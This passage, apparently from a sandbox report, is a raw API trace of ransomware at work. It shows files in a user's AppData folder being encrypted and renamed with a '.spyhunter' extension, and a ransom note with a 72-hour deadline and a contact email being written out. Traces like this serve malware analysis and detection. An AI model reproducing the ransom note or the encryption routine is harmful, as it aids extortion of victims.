nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb8c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb8c*=0x30, lpOverlapped=0x0) returned 1 [0156.372] CloseHandle (hObject=0xb0) returned 1 [0156.372] GetProcessHeap () returned 0x2c0000 [0156.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.373] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.spyhunter") returned 89 [0156.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat.spyhunter")) returned 1 [0156.373] GetProcessHeap () returned 0x2c0000 [0156.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.373] GetProcessHeap () returned 0x2c0000 [0156.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.373] GetProcessHeap () returned 0x2c0000 [0156.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eefa88 | out: hHeap=0x2c0000) returned 1 [0156.374] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebc8 | out: pbBuffer=0x57ebc8) returned 1 [0156.374] GetProcessHeap () returned 0x2c0000 [0156.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.374] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ebc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ebc0*=0x30) returned 1 [0156.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 81 [0156.375] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0156.375] GetProcessHeap () returned 0x2c0000 [0156.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.375] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57eb84*=0x43, lpOverlapped=0x0) returned 1 [0156.376] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.376] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x57eb84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57eb84*=0x43, lpOverlapped=0x0) returned 1 [0156.376] GetProcessHeap () returned 0x2c0000 [0156.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.376] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.376] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb84, lpOverlapped=0x0 | out: lpBuffer=0x57ebc4*, lpNumberOfBytesWritten=0x57eb84*=0x4, lpOverlapped=0x0) returned 1 [0156.376] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb84, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb84*=0x30, lpOverlapped=0x0) returned 1 [0156.376] CloseHandle (hObject=0xb0) returned 1 [0156.376] GetProcessHeap () returned 0x2c0000 [0156.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.376] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.spyhunter") returned 91 [0156.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini.spyhunter")) returned 1 [0156.377] GetProcessHeap () returned 0x2c0000 [0156.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.377] GetProcessHeap () returned 0x2c0000 [0156.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.377] GetProcessHeap () returned 0x2c0000 [0156.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d558 | out: hHeap=0x2c0000) returned 1 [0156.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.378] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.378] WriteFile (in: hFile=0xb0, lpBuffer=0x57eafb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ec24, lpOverlapped=0x0 | out: lpBuffer=0x57eafb*, lpNumberOfBytesWritten=0x57ec24*=0x127, lpOverlapped=0x0) returned 1 [0156.379] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.379] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ec24, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ec24*=0x2ac, lpOverlapped=0x0) returned 1 [0156.379] CloseHandle (hObject=0xb0) returned 1 [0156.379] GetProcessHeap () returned 0x2c0000 [0156.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b670 | out: hHeap=0x2c0000) returned 1 [0156.379] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebc0 | out: pbBuffer=0x57ebc0) returned 1 [0156.379] GetProcessHeap () returned 0x2c0000 [0156.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.379] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ebb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ebb8*=0x30) returned 1 [0156.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 88 [0156.380] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0156.380] GetProcessHeap () returned 0x2c0000 [0156.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.380] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57eb7c*=0x0, lpOverlapped=0x0) returned 1 [0156.380] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.380] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x57eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57eb7c*=0x0, lpOverlapped=0x0) returned 1 [0156.380] GetProcessHeap () returned 0x2c0000 [0156.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.380] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.380] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb7c, lpOverlapped=0x0 | out: lpBuffer=0x57ebbc*, lpNumberOfBytesWritten=0x57eb7c*=0x4, lpOverlapped=0x0) returned 1 [0156.381] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb7c*=0x30, lpOverlapped=0x0) returned 1 [0156.381] CloseHandle (hObject=0xb0) returned 1 [0156.381] GetProcessHeap () returned 0x2c0000 [0156.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.381] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].spyhunter") returned 98 [0156.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1].spyhunter")) returned 1 [0156.382] GetProcessHeap () returned 0x2c0000 [0156.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.382] GetProcessHeap () returned 0x2c0000 [0156.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.382] GetProcessHeap () returned 0x2c0000 [0156.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45328 | out: hHeap=0x2c0000) returned 1 [0156.383] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebc0 | out: pbBuffer=0x57ebc0) returned 1 [0156.383] GetProcessHeap () returned 0x2c0000 [0156.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.383] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ebb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ebb8*=0x30) returned 1 [0156.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 90 [0156.384] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0156.384] GetProcessHeap () returned 0x2c0000 [0156.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.384] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57eb7c*=0x43, lpOverlapped=0x0) returned 1 [0156.385] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.385] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x57eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57eb7c*=0x43, lpOverlapped=0x0) returned 1 [0156.385] GetProcessHeap () returned 0x2c0000 [0156.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.385] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.385] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb7c, lpOverlapped=0x0 | out: lpBuffer=0x57ebbc*, lpNumberOfBytesWritten=0x57eb7c*=0x4, lpOverlapped=0x0) returned 1 [0156.385] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb7c*=0x30, lpOverlapped=0x0) returned 1 [0156.386] CloseHandle (hObject=0xb0) returned 1 [0156.386] GetProcessHeap () returned 0x2c0000 [0156.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.386] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.spyhunter") returned 100 [0156.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.spyhunter")) returned 1 [0156.409] GetProcessHeap () returned 0x2c0000 [0156.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.409] GetProcessHeap () returned 0x2c0000 [0156.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.409] GetProcessHeap () returned 0x2c0000 [0156.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45228 | out: hHeap=0x2c0000) returned 1 [0156.409] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebb8 | out: pbBuffer=0x57ebb8) returned 1 [0156.409] GetProcessHeap () returned 0x2c0000 [0156.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.409] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ebb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ebb0*=0x30) returned 1 [0156.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.441] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 90 [0156.441] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0156.441] GetProcessHeap () returned 0x2c0000 [0156.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.441] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57eb74*=0x43, lpOverlapped=0x0) returned 1 [0156.442] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.442] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x57eb74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57eb74*=0x43, lpOverlapped=0x0) returned 1 [0156.442] GetProcessHeap () returned 0x2c0000 [0156.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.442] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.442] WriteFile (in: hFile=0xa0, lpBuffer=0x57ebb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb74, lpOverlapped=0x0 | out: lpBuffer=0x57ebb4*, lpNumberOfBytesWritten=0x57eb74*=0x4, lpOverlapped=0x0) returned 1 [0156.442] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb74, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb74*=0x30, lpOverlapped=0x0) returned 1 [0156.442] CloseHandle (hObject=0xa0) returned 1 [0156.442] GetProcessHeap () returned 0x2c0000 [0156.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.442] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.spyhunter") returned 100 [0156.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.spyhunter")) returned 1 [0156.450] GetProcessHeap () returned 0x2c0000 [0156.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.450] GetProcessHeap () returned 0x2c0000 [0156.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.450] GetProcessHeap () returned 0x2c0000 [0156.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45028 | out: hHeap=0x2c0000) returned 1 [0156.450] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebb8 | out: pbBuffer=0x57ebb8) returned 1 [0156.450] GetProcessHeap () returned 0x2c0000 [0156.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.450] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ebb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ebb0*=0x30) returned 1 [0156.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.451] GetProcessHeap () returned 0x2c0000 [0156.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.451] GetProcessHeap () returned 0x2c0000 [0156.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f476e8 | out: hHeap=0x2c0000) returned 1 [0156.451] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebb0 | out: pbBuffer=0x57ebb0) returned 1 [0156.451] GetProcessHeap () returned 0x2c0000 [0156.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.451] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eba8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eba8*=0x30) returned 1 [0156.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.451] GetProcessHeap () returned 0x2c0000 [0156.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.451] GetProcessHeap () returned 0x2c0000 [0156.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47820 | out: hHeap=0x2c0000) returned 1 [0156.451] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebb0 | out: pbBuffer=0x57ebb0) returned 1 [0156.451] GetProcessHeap () returned 0x2c0000 [0156.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.451] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eba8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eba8*=0x30) returned 1 [0156.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.452] GetProcessHeap () returned 0x2c0000 [0156.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.452] GetProcessHeap () returned 0x2c0000 [0156.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbbe00 | out: hHeap=0x2c0000) returned 1 [0156.452] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eba8 | out: pbBuffer=0x57eba8) returned 1 [0156.452] GetProcessHeap () returned 0x2c0000 [0156.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.452] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, 